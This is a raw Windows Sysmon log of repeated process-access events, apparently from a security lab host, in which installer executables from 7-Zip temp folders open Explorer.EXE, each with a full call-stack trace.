13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000015875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000015874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000015872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000015871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000015870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000015868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000015867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000015866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000015864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000015863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000015862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\Syst